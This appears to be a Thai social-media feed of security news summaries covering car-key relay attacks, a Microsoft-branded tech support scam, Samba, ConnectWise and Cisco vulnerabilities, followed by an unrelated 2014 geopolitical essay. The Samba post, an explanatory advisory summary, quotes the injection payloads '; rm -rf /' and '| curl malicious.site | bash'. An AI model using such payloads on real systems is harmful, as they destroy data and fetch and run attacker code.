สำหรับเก็บกุญแจโดยเฉพาะ ราคาเริ่มต้นเพียง $9.99 ➡️ รุ่นที่กันไฟและน้ำมีราคาเพียง $14.99 ➡️ เก็บกุญแจไว้ในช่องแช่แข็งก็ช่วยลดสัญญาณได้ แม้จะมีความเสี่ยงต่อความเย็น ➡️ วางกุญแจไว้ในห้องชั้นบน ห่างจากหน้าต่าง ก็ช่วยลดโอกาสถูกขยายสัญญาณ ➡️ ใช้ล็อกพวงมาลัยแบบเก่าเพื่อเพิ่มความปลอดภัย ‼️ คำเตือนเพิ่มเติม ⛔ ช่องแช่แข็งอาจทำให้แบตเตอรี่กุญแจเสียหายจากความเย็น ⛔ การใช้ฟอยล์ห่อกุญแจอาจได้ผล แต่ไม่มั่นคงเท่ากระเป๋า Faraday ⛔ การพึ่งพาวิธี DIY โดยไม่เข้าใจความเสี่ยง อาจนำไปสู่ความเสียหายทางทรัพย์สิน 📎 สาระเพิ่มเติมจากภายนอก: ✅ หลักการของ Faraday Cage ➡️ เป็นโครงสร้างที่ป้องกันคลื่นแม่เหล็กไฟฟ้าไม่ให้เข้าออก ➡️ ใช้ในงานวิทยาศาสตร์ การแพทย์ และความปลอดภัยไซเบอร์ ✅ แนวโน้มการออกแบบกุญแจรถในอนาคต ➡️ ผู้ผลิตเริ่มพัฒนาเทคโนโลยี anti-relay ในกุญแจรุ่นใหม่ ➡️ การใช้ Bluetooth Low Energy และระบบยืนยันตัวตนหลายชั้นจะช่วยลดความเสี่ยง https://www.slashgear.com/1997582/vehicle-theft-prevention-microwave-hack-warning/
    WWW.SLASHGEAR.COM
    This Kitchen Appliance Could Prevent Car Theft – But It Comes At Too High A Risk - SlashGear
    Car owners afraid of relay attacks have taken to using a common kitchen appliance to secure their key fob, but the benefits far outweigh the risks.
    0 Comments 0 Shares 170 Views 0 Reviews
  • “หลอกลวงใหม่ใช้โลโก้ Microsoft ล็อกเบราว์เซอร์เพื่อขโมยข้อมูล” — เทคนิคใหม่ของ scammer ที่สร้างสถานการณ์ปลอมให้ผู้ใช้ตื่นตระหนก

    รายงานจาก Cofense Phishing Defense Centre เผยการโจมตีแบบใหม่ที่ใช้แบรนด์ Microsoft เพื่อหลอกลวงผู้ใช้ให้โทรหาเบอร์สนับสนุนปลอม โดยเริ่มจากอีเมลที่เสนอ “เงินคืน” จากบริษัทปลอม เช่น Syria Rent a Car เพื่อดึงดูดให้ผู้ใช้คลิกลิงก์

    เมื่อคลิกแล้ว ผู้ใช้จะถูกนำไปยัง CAPTCHA ปลอมเพื่อสร้างความน่าเชื่อถือและหลบเลี่ยงระบบตรวจจับอัตโนมัติ หลังจากผ่าน CAPTCHA จะเข้าสู่หน้าเว็บที่แสดง popup ปลอมว่าเครื่องติดไวรัส พร้อมข้อความเตือนจาก “Microsoft” และเบอร์โทรปลอม

    เบราว์เซอร์จะถูกทำให้ดูเหมือน “ล็อก” โดยผู้ใช้ไม่สามารถควบคุมเมาส์ได้ สร้างความตื่นตระหนกและทำให้ผู้ใช้โทรหาเบอร์ที่แสดง ซึ่งจะเชื่อมต่อกับ “ช่างเทคนิคปลอม” ที่พยายามขโมยข้อมูลบัญชี หรือให้ติดตั้งโปรแกรมควบคุมระยะไกลเพื่อเข้าถึงเครื่อง

    ผู้เชี่ยวชาญเตือนว่าเบราว์เซอร์ไม่ได้ถูกล็อกจริง และสามารถกด ESC เพื่อออกจากสถานการณ์ได้

    ข้อมูลในข่าว
    การโจมตีเริ่มจากอีเมลหลอกลวงที่เสนอเงินคืนจากบริษัทปลอม
    ลิงก์ในอีเมลนำไปสู่ CAPTCHA ปลอมเพื่อหลบเลี่ยงระบบตรวจจับ
    หน้าเว็บสุดท้ายแสดง popup ปลอมว่าเครื่องติดไวรัส
    ใช้โลโก้ Microsoft และข้อความปลอมเพื่อสร้างความน่าเชื่อถือ
    เบราว์เซอร์ถูกทำให้ดูเหมือนล็อก และเมาส์ไม่ตอบสนอง
    ผู้ใช้ถูกหลอกให้โทรหาเบอร์ปลอมที่แสดงบนหน้าจอ
    “ช่างเทคนิคปลอม” พยายามขโมยข้อมูลหรือให้ติดตั้งโปรแกรมควบคุมระยะไกล
    เบราว์เซอร์ไม่ได้ถูกล็อกจริง และสามารถกด ESC เพื่อออกจากสถานการณ์
    เป้าหมายของการโจมตีคือการขโมยข้อมูลและเข้าถึงระบบของผู้ใช้
    Cofense เตือนว่าเป็นการใช้ความไว้วางใจในแบรนด์เพื่อหลอกลวง

    https://hackread.com/tech-support-scam-microsoft-logo-browser-lock-data/
    🔒 “หลอกลวงใหม่ใช้โลโก้ Microsoft ล็อกเบราว์เซอร์เพื่อขโมยข้อมูล” — เทคนิคใหม่ของ scammer ที่สร้างสถานการณ์ปลอมให้ผู้ใช้ตื่นตระหนก รายงานจาก Cofense Phishing Defense Centre เผยการโจมตีแบบใหม่ที่ใช้แบรนด์ Microsoft เพื่อหลอกลวงผู้ใช้ให้โทรหาเบอร์สนับสนุนปลอม โดยเริ่มจากอีเมลที่เสนอ “เงินคืน” จากบริษัทปลอม เช่น Syria Rent a Car เพื่อดึงดูดให้ผู้ใช้คลิกลิงก์ เมื่อคลิกแล้ว ผู้ใช้จะถูกนำไปยัง CAPTCHA ปลอมเพื่อสร้างความน่าเชื่อถือและหลบเลี่ยงระบบตรวจจับอัตโนมัติ หลังจากผ่าน CAPTCHA จะเข้าสู่หน้าเว็บที่แสดง popup ปลอมว่าเครื่องติดไวรัส พร้อมข้อความเตือนจาก “Microsoft” และเบอร์โทรปลอม เบราว์เซอร์จะถูกทำให้ดูเหมือน “ล็อก” โดยผู้ใช้ไม่สามารถควบคุมเมาส์ได้ สร้างความตื่นตระหนกและทำให้ผู้ใช้โทรหาเบอร์ที่แสดง ซึ่งจะเชื่อมต่อกับ “ช่างเทคนิคปลอม” ที่พยายามขโมยข้อมูลบัญชี หรือให้ติดตั้งโปรแกรมควบคุมระยะไกลเพื่อเข้าถึงเครื่อง ผู้เชี่ยวชาญเตือนว่าเบราว์เซอร์ไม่ได้ถูกล็อกจริง และสามารถกด ESC เพื่อออกจากสถานการณ์ได้ ✅ ข้อมูลในข่าว ➡️ การโจมตีเริ่มจากอีเมลหลอกลวงที่เสนอเงินคืนจากบริษัทปลอม ➡️ ลิงก์ในอีเมลนำไปสู่ CAPTCHA ปลอมเพื่อหลบเลี่ยงระบบตรวจจับ ➡️ หน้าเว็บสุดท้ายแสดง popup ปลอมว่าเครื่องติดไวรัส ➡️ ใช้โลโก้ Microsoft และข้อความปลอมเพื่อสร้างความน่าเชื่อถือ ➡️ เบราว์เซอร์ถูกทำให้ดูเหมือนล็อก และเมาส์ไม่ตอบสนอง ➡️ ผู้ใช้ถูกหลอกให้โทรหาเบอร์ปลอมที่แสดงบนหน้าจอ ➡️ “ช่างเทคนิคปลอม” พยายามขโมยข้อมูลหรือให้ติดตั้งโปรแกรมควบคุมระยะไกล ➡️ เบราว์เซอร์ไม่ได้ถูกล็อกจริง และสามารถกด ESC เพื่อออกจากสถานการณ์ ➡️ เป้าหมายของการโจมตีคือการขโมยข้อมูลและเข้าถึงระบบของผู้ใช้ ➡️ Cofense เตือนว่าเป็นการใช้ความไว้วางใจในแบรนด์เพื่อหลอกลวง https://hackread.com/tech-support-scam-microsoft-logo-browser-lock-data/
    HACKREAD.COM
    New Tech Support Scam Uses Microsoft Logo to Fake Browser Lock, Steal Data
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 Comments 0 Shares 115 Views 0 Reviews
  • “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน

    ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf

    ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash

    เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที

    ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ

    ทีม Samba แนะนำให้ผู้ดูแลระบบ:
    ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf
    ปิดการใช้งาน WINS server (wins support = no)
    อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9

    ข้อมูลในข่าว
    ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม
    เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell
    ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน
    มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook”
    WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ
    NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้
    Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ
    วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no)
    เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9
    “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต

    https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    🧨 “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ ทีม Samba แนะนำให้ผู้ดูแลระบบ: 🚑 ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf 🚑 ปิดการใช้งาน WINS server (wins support = no) 🚑 อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9 ✅ ข้อมูลในข่าว ➡️ ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม ➡️ เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell ➡️ ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ➡️ มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook” ➡️ WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ ➡️ NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้ ➡️ Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ ➡️ วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no) ➡️ เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9 ➡️ “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    SECURITYONLINE.INFO
    Critical Samba RCE Flaw CVE-2025-10230 (CVSS 10.0) Allows Unauthenticated Command Injection on AD DCs
    Samba released an urgent fix for a Critical (CVSS 10.0) RCE flaw (CVE-2025-10230) allowing unauthenticated command injection on AD DCs when the WINS hook is enabled. Update to 4.23.2.
    0 Comments 0 Shares 164 Views 0 Reviews
  • “ช่องโหว่ CVE-2025-11492 บน ConnectWise Automate” — เสี่ยงถูกโจมตีแบบ Man-in-the-Middle หากใช้ HTTP แทน HTTPS

    ConnectWise ได้ออกแพตช์ฉุกเฉินสำหรับช่องโหว่ร้ายแรง CVE-2025-11492 ซึ่งมีคะแนน CVSS สูงถึง 9.6 โดยช่องโหว่นี้เกิดจากการตั้งค่าที่อนุญาตให้ Agent ของระบบ Automate ใช้การสื่อสารผ่าน HTTP แทน HTTPS ซึ่งเปิดช่องให้ผู้โจมตีที่อยู่ในตำแหน่งเครือข่ายแบบ Man-in-the-Middle (MitM) สามารถดักฟัง แก้ไข หรือส่งคำสั่งปลอมไปยังเซิร์ฟเวอร์ได้

    ช่องโหว่นี้มีผลกระทบสูงมาก เพราะ ConnectWise Automate เป็นระบบ RMM (Remote Monitoring and Management) ที่มีสิทธิ์เข้าถึงระดับผู้ดูแลระบบในเครื่องลูกข่ายจำนวนมาก หากถูกโจมตีสำเร็จ อาจนำไปสู่การติดตั้งมัลแวร์หรือการควบคุมระบบจากระยะไกล

    แพตช์เวอร์ชัน 2025.9 ได้แก้ไขโดยบังคับให้ Agent ทุกตัวใช้ HTTPS เท่านั้น และแนะนำให้ผู้ใช้ที่ติดตั้งแบบ on-premise เปิดใช้ TLS 1.2 เพื่อเพิ่มความปลอดภัยในการสื่อสาร

    นอกจากนี้ยังมีช่องโหว่ CVE-2025-11493 (CVSS 8.8) ที่เกี่ยวข้องกับการตรวจสอบไฟล์อัปเดตไม่เพียงพอ ซึ่งอาจทำให้ผู้โจมตีแทรกไฟล์ปลอมระหว่างการอัปเดต Agent ได้ โดยช่องโหว่นี้จะถูกปิดเมื่อมีการบังคับใช้ HTTPS เช่นกัน

    ข้อมูลในข่าว
    ช่องโหว่ CVE-2025-11492 มีคะแนน CVSS 9.6 เกิดจากการใช้ HTTP แทน HTTPS
    เสี่ยงถูกโจมตีแบบ Man-in-the-Middle หากอยู่ในเครือข่ายเดียวกัน
    ConnectWise Automate เป็นระบบ RMM ที่มีสิทธิ์ระดับสูงในเครื่องลูกข่าย
    แพตช์เวอร์ชัน 2025.9 บังคับใช้ HTTPS สำหรับ Agent ทุกตัว
    แนะนำให้เปิดใช้ TLS 1.2 สำหรับเซิร์ฟเวอร์แบบ on-premise
    ช่องโหว่ CVE-2025-11493 เกี่ยวข้องกับการตรวจสอบไฟล์อัปเดตไม่เพียงพอ
    การบังคับใช้ HTTPS ช่วยปิดช่องโหว่ทั้งสองตัว
    ระบบ cloud-hosted ของ ConnectWise ได้รับการอัปเดตแล้ว
    ผู้ใช้แบบ on-premise ต้องอัปเดตด้วยตนเองเพื่อป้องกันความเสี่ยง

    https://securityonline.info/critical-connectwise-automate-flaw-cve-2025-11492-cvss-9-6-allows-rmm-agent-man-in-the-middle-attack/
    🔐 “ช่องโหว่ CVE-2025-11492 บน ConnectWise Automate” — เสี่ยงถูกโจมตีแบบ Man-in-the-Middle หากใช้ HTTP แทน HTTPS ConnectWise ได้ออกแพตช์ฉุกเฉินสำหรับช่องโหว่ร้ายแรง CVE-2025-11492 ซึ่งมีคะแนน CVSS สูงถึง 9.6 โดยช่องโหว่นี้เกิดจากการตั้งค่าที่อนุญาตให้ Agent ของระบบ Automate ใช้การสื่อสารผ่าน HTTP แทน HTTPS ซึ่งเปิดช่องให้ผู้โจมตีที่อยู่ในตำแหน่งเครือข่ายแบบ Man-in-the-Middle (MitM) สามารถดักฟัง แก้ไข หรือส่งคำสั่งปลอมไปยังเซิร์ฟเวอร์ได้ ช่องโหว่นี้มีผลกระทบสูงมาก เพราะ ConnectWise Automate เป็นระบบ RMM (Remote Monitoring and Management) ที่มีสิทธิ์เข้าถึงระดับผู้ดูแลระบบในเครื่องลูกข่ายจำนวนมาก หากถูกโจมตีสำเร็จ อาจนำไปสู่การติดตั้งมัลแวร์หรือการควบคุมระบบจากระยะไกล แพตช์เวอร์ชัน 2025.9 ได้แก้ไขโดยบังคับให้ Agent ทุกตัวใช้ HTTPS เท่านั้น และแนะนำให้ผู้ใช้ที่ติดตั้งแบบ on-premise เปิดใช้ TLS 1.2 เพื่อเพิ่มความปลอดภัยในการสื่อสาร นอกจากนี้ยังมีช่องโหว่ CVE-2025-11493 (CVSS 8.8) ที่เกี่ยวข้องกับการตรวจสอบไฟล์อัปเดตไม่เพียงพอ ซึ่งอาจทำให้ผู้โจมตีแทรกไฟล์ปลอมระหว่างการอัปเดต Agent ได้ โดยช่องโหว่นี้จะถูกปิดเมื่อมีการบังคับใช้ HTTPS เช่นกัน ✅ ข้อมูลในข่าว ➡️ ช่องโหว่ CVE-2025-11492 มีคะแนน CVSS 9.6 เกิดจากการใช้ HTTP แทน HTTPS ➡️ เสี่ยงถูกโจมตีแบบ Man-in-the-Middle หากอยู่ในเครือข่ายเดียวกัน ➡️ ConnectWise Automate เป็นระบบ RMM ที่มีสิทธิ์ระดับสูงในเครื่องลูกข่าย ➡️ แพตช์เวอร์ชัน 2025.9 บังคับใช้ HTTPS สำหรับ Agent ทุกตัว ➡️ แนะนำให้เปิดใช้ TLS 1.2 สำหรับเซิร์ฟเวอร์แบบ on-premise ➡️ ช่องโหว่ CVE-2025-11493 เกี่ยวข้องกับการตรวจสอบไฟล์อัปเดตไม่เพียงพอ ➡️ การบังคับใช้ HTTPS ช่วยปิดช่องโหว่ทั้งสองตัว ➡️ ระบบ cloud-hosted ของ ConnectWise ได้รับการอัปเดตแล้ว ➡️ ผู้ใช้แบบ on-premise ต้องอัปเดตด้วยตนเองเพื่อป้องกันความเสี่ยง https://securityonline.info/critical-connectwise-automate-flaw-cve-2025-11492-cvss-9-6-allows-rmm-agent-man-in-the-middle-attack/
    SECURITYONLINE.INFO
    Critical ConnectWise Automate Flaw (CVE-2025-11492, CVSS 9.6) Allows RMM Agent Man-in-the-Middle Attack
    ConnectWise patched two high-severity flaws in Automate RMM. CVE-2025-11492 (CVSS 9.6) allows MiTM attack to intercept unencrypted agent communications and inject malicious updates. Update to 2025.9.
    0 Comments 0 Shares 128 Views 0 Reviews
  • “Operation Zero Disco” — ช่องโหว่ SNMP ของ Cisco ถูกใช้ฝัง rootkit บนสวิตช์ Linux

    นักวิจัยจาก Trend Research เปิดเผยแคมเปญการโจมตีไซเบอร์ขั้นสูงชื่อ “Operation Zero Disco” ซึ่งใช้ช่องโหว่ CVE-2025-20352 ในบริการ SNMP ของ Cisco เพื่อฝัง rootkit บนสวิตช์ที่ใช้ Linux โดยเฉพาะรุ่น 9400, 9300 และ 3750G ที่ไม่มีระบบป้องกันแบบ EDR

    เมื่อโจมตีสำเร็จ ผู้ไม่หวังดีสามารถ:

    เข้าถึงระบบจากระยะไกล (RCE)
    ตั้งรหัสผ่าน universal ที่มีคำว่า “disco”
    ฝัง hook เข้าไปในหน่วยความจำ IOSd เพื่อหลบเลี่ยงการตรวจจับ
    รับคำสั่งลับผ่าน UDP แม้พอร์ตจะปิดอยู่
    ซ่อนบัญชีผู้ใช้, ACL และสคริปต์ EEM จาก config
    ลบหรือแก้ไข log เพื่อปกปิดร่องรอยการโจมตี
    ข้ามข้อจำกัด VTY access สำหรับ Telnet และ SSH

    แฮกเกอร์เริ่มจากการใช้ community string “public” ของ SNMP เพื่อเข้าถึง core switch จากนั้นปลอมตัวเป็นอุปกรณ์ภายในที่เชื่อถือได้เพื่อข้าม firewall และใช้ ARP spoofing เพื่อควบคุมการสื่อสารในเครือข่าย

    นอกจากนี้ยังพบว่ามีการใช้ช่องโหว่ Telnet เก่า CVE-2017-3881 ที่ถูกดัดแปลงให้สามารถอ่าน/เขียนหน่วยความจำโดยตรง

    Cisco ได้ออกคำแนะนำด้านความปลอดภัยให้:
    ปิด SNMP หากไม่จำเป็น
    เปลี่ยน community string จากค่าเริ่มต้น
    อัปเดต firmware ทันที

    จุดเด่นจากรายงาน
    ช่องโหว่ CVE-2025-20352 ถูกใช้โจมตีสวิตช์ Cisco รุ่นเก่า
    rootkit ฝังตัวลึกใน IOSd memory และหลบเลี่ยงการตรวจจับ
    รับคำสั่งผ่าน UDP โดยไม่ต้องเปิดพอร์ต
    ซ่อน config และ log เพื่อปิดบังการบุกรุก
    ใช้ ARP spoofing เพื่อควบคุมการสื่อสารระหว่าง VLAN
    ใช้ช่องโหว่ Telnet เก่าที่ถูกดัดแปลงเพื่อควบคุมหน่วยความจำ
    Cisco แนะนำให้ปิด SNMP และอัปเดตระบบทันที


    https://securityonline.info/operation-zero-disco-critical-cisco-snmp-flaw-cve-2025-20352-used-to-implant-linux-rootkits-on-switches/
    🕵️‍♂️ “Operation Zero Disco” — ช่องโหว่ SNMP ของ Cisco ถูกใช้ฝัง rootkit บนสวิตช์ Linux นักวิจัยจาก Trend Research เปิดเผยแคมเปญการโจมตีไซเบอร์ขั้นสูงชื่อ “Operation Zero Disco” ซึ่งใช้ช่องโหว่ CVE-2025-20352 ในบริการ SNMP ของ Cisco เพื่อฝัง rootkit บนสวิตช์ที่ใช้ Linux โดยเฉพาะรุ่น 9400, 9300 และ 3750G ที่ไม่มีระบบป้องกันแบบ EDR เมื่อโจมตีสำเร็จ ผู้ไม่หวังดีสามารถ: 🪲 เข้าถึงระบบจากระยะไกล (RCE) 🪲 ตั้งรหัสผ่าน universal ที่มีคำว่า “disco” 🪲 ฝัง hook เข้าไปในหน่วยความจำ IOSd เพื่อหลบเลี่ยงการตรวจจับ 🪲 รับคำสั่งลับผ่าน UDP แม้พอร์ตจะปิดอยู่ 🪲 ซ่อนบัญชีผู้ใช้, ACL และสคริปต์ EEM จาก config 🪲 ลบหรือแก้ไข log เพื่อปกปิดร่องรอยการโจมตี 🪲 ข้ามข้อจำกัด VTY access สำหรับ Telnet และ SSH แฮกเกอร์เริ่มจากการใช้ community string “public” ของ SNMP เพื่อเข้าถึง core switch จากนั้นปลอมตัวเป็นอุปกรณ์ภายในที่เชื่อถือได้เพื่อข้าม firewall และใช้ ARP spoofing เพื่อควบคุมการสื่อสารในเครือข่าย นอกจากนี้ยังพบว่ามีการใช้ช่องโหว่ Telnet เก่า CVE-2017-3881 ที่ถูกดัดแปลงให้สามารถอ่าน/เขียนหน่วยความจำโดยตรง Cisco ได้ออกคำแนะนำด้านความปลอดภัยให้: 🚑 ปิด SNMP หากไม่จำเป็น 🚑 เปลี่ยน community string จากค่าเริ่มต้น 🚑 อัปเดต firmware ทันที ✅ จุดเด่นจากรายงาน ➡️ ช่องโหว่ CVE-2025-20352 ถูกใช้โจมตีสวิตช์ Cisco รุ่นเก่า ➡️ rootkit ฝังตัวลึกใน IOSd memory และหลบเลี่ยงการตรวจจับ ➡️ รับคำสั่งผ่าน UDP โดยไม่ต้องเปิดพอร์ต ➡️ ซ่อน config และ log เพื่อปิดบังการบุกรุก ➡️ ใช้ ARP spoofing เพื่อควบคุมการสื่อสารระหว่าง VLAN ➡️ ใช้ช่องโหว่ Telnet เก่าที่ถูกดัดแปลงเพื่อควบคุมหน่วยความจำ ➡️ Cisco แนะนำให้ปิด SNMP และอัปเดตระบบทันที https://securityonline.info/operation-zero-disco-critical-cisco-snmp-flaw-cve-2025-20352-used-to-implant-linux-rootkits-on-switches/
    SECURITYONLINE.INFO
    Operation Zero Disco: Critical Cisco SNMP Flaw (CVE-2025-20352) Used to Implant Linux Rootkits on Switches
    "Operation Zero Disco" exploits a critical Cisco SNMP flaw (CVE-2025-20352) to deploy Linux rootkits on switches. The malware sets a universal "disco" password and hides configuration to maintain persistence.
    0 Comments 0 Shares 143 Views 0 Reviews
  • รุกฆาต หรือ รุกคืบ ตอนที่ 4
    “รุกฆาต หรือ รุกคืบ”
    ตอนที่ 4 (ตอนจบ)

    อเมริกาไม่มีทางเลือกมาก ผ้าเปิดเห็นหมดแล้วว่า หลังจากประเมินคู่หูรัสเซียจีน ผิด คิดไปดักตีหัวเขา ผิดทิศผิดทาง ยังไม่พอ นึกว่าเวลายังมี ดันงัดเอาหนังเรื่อง ตัดเหี้ยน มาออกโรงฉายฆ่าเวลาไป 2 ปี เล่นเอากองทัพแผ่วไปหลายกิโล กองทัพก็เหมือนกล้ามเนื้อท้อง เคยออกกำลังบ่อยๆ วิ่งเล่นไล่จับแถวอิรัค สลับอาฟกานิสถาน มานานเป็นสิบปี พอไม่ค่อยได้ใช้ แถมสั่งถอน สั่งลด สั่งงดการฝึก กล้ามมันก็ห้อยย้อยหมด จะให้กลับขึ้นเป็นแผง มันก็ต้องใช้เวลาฟิต เพราะฉนั้น อเมริกาไม่น่าเลือกใช้วิธีรบยืดเยื้อ เหมือนรบกับอิรัค อาฟกานิสถาน เพราะศักยภาพของรัสเซียและพวก คนละเรื่องกับพวกที่อเมริกาเคยไปวิ่งเล่นไล่จับด้วย อเมริกาอาจจบไม่สวย อาจถึงขนาดไม่สวยอย่างมาก

    อเมริกาถือตัวว่า ในด้านอาวุธทำลายล้างของตน มีศักยภาพสูงสุด มีเทคโนโลยีที่เหนือกว่าใครๆ ในใลก ดังนั้นโอกาสที่อเมริกา จะเลือกยุทธศาสตร์ สยบฝ่าย รัสเซียและพวก ด้วยกำลังอาวุธสาระพัดชนิด โดยเฉพาะพวกระยะไกล น่าจะมีความเป็นได้สูงกว่า

    ถ้าเลือกใช้อาวุธนำ อเมริกาจะใช้กับใคร และเมื่อไหร่ ที่สำคัญมันต้องเป็นหมากพิฆาต รุกฆาต ตาเดียวจบ เพราะถ้าไม่รุกฆาตจริง อเมริกาเหนื่อยแน่ การตอบโต้จากอีกฝ่าย คงเกิดขึ้นมาจากสาระพัดทิศอย่างแน่นอน และเราคงได้เห็นดอกเห็ดบานเต็มท้องฟ้า

    ถ้าอเมริกา ไม่เลือกใช้วิธีรุกฆาตด้วยอาวุธ แต่ใช้ยุทธศาสตร์รุกคืบ ค่อยๆเคลื่อนพลปิดล้อม ฝ่ายรัสเซียและพวก เหมือนลนไฟให้ร้อนระอุขึ้นเรื่อยๆ กระจายตามที่ต่างๆ ตามจังหวะความพร้อมของตัว สมันน้อยก็เตรียมตัวกันด้วยแล้วกัน จะไปขุดรู อยู่ป่า ก็เริ่มคิดไว้บ้าง ไอ้ประเภทสร้างอุโมงค์เตรียมให้ประชาชนหลบภัย เตรียมน้ำ เตรียมยา อาหาร นั่นมันในหนัง หรือบ้านอื่นที่ท่านผู้นำเขามองการณ์ไกล

    แล้วคิดว่า ฝ่ายรัสเซียกับพวก เขาจะนั่งตาลอย ทำหน้าหล่อ มองอเมริกาขยับหมากอยู่ฝ่ายเดียวอย่างนั้นหรือ!?!

    สวัสดีครับ
    คนเล่านิทาน
    14 ธค. 2557
